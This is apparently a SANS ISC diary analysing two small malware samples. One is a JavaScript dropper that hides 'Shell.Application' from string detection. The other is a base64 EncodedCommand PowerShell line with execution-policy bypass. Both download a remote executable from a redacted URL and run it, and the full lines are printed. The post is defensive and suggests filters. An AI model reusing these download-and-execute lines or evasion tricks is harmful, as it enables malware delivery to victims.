Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Diverting built-in features for the bad

Published: 2017-03-30
Last Updated: 2017-03-30 07:50:59 UTC
by Xavier Mertens (Version: 1)
2 comment(s)

Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code:

var d=new ActiveXObject(‘Shell.NormandApplication’.replace(‘Normand’, ‘’));
d.ShellExecute(“PowerShell”,”((New-Object System.Net.WebClient).DownloadFile(‘http://[redacted].exe', ‘xwing.pif’);Start-Process ‘xwing.pif’”,””,””,0);

There is no real obfuscation here, just a trick to avoid the detection of the string ‘Shell.Application’ which often searched by automated tools…

Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell which has the following cool feature: EncodedCommand[1].

Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces.

Here is a sample that I also detected yesterday (the lines have been truncated for the readability):

poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \

The decoded Base64 string is:

(nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE(  https://[redacted]/images/Scan_2.exe  ,  $env:TEmP\output.exe  ) ; inVokE-ExPResSIoN  $ENv:tEMP\output.exe

Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).

Note that the PE file is downloaded via HTTPS!


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

2 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Critical VMware vulnerabilities disclosed
Mar 29th 2017
1 day ago by Xme (0 comments)

Logical & Physical Security Correlation
Mar 29th 2017
1 day ago by Xme (0 comments)

Symantec vs. Google: The CA Fight Continues. What do you need to know?
Mar 27th 2017
3 days ago by Johannes (2 comments)

Distraction as a Service
Mar 25th 2017
5 days ago by Russell (6 comments)

Nicely Obfuscated JavaScript Sample
Mar 24th 2017
6 days ago by Xme (3 comments)

SSMA Usage
Mar 23rd 2017
1 week ago by Tom (1 comment)

View All Diaries →

Latest Discussions

Preventing outside sources accessing the local network via open ports on a networked printer.
created Mar 28th 2017
2 days ago by mrectek (2 replies)

Very High DNS traffic
created Mar 26th 2017
4 days ago by Anonymous (0 replies)

Abnormal DNS Volumes
created Mar 26th 2017
4 days ago by Anonymous (2 replies)

"Insecure" technical requirements for online course?
created Mar 24th 2017
6 days ago by Marko (1 reply)

CTI Summit Keynote - Cliff Stoll - (Still) Stalking the Wily Hacker
created Mar 11th 2017
2 weeks ago by Russell (1 reply)

View All Forums →

Latest News

View All News →

Top Diaries

Malspam with password-protected Word documents
Mar 21st 2017
1 week ago by Brad (12 comments) DDoS Attack
Oct 21st 2016
5 months ago by Johannes (9 comments)

Distraction as a Service
Mar 25th 2017
5 days ago by Russell (6 comments)

Microsoft Patch Tuesday Delayed
Feb 18th 2017
1 month ago by Johannes (7 comments)

The Side Effect of GeoIP Filters
Mar 10th 2017
2 weeks ago by Xme (7 comments)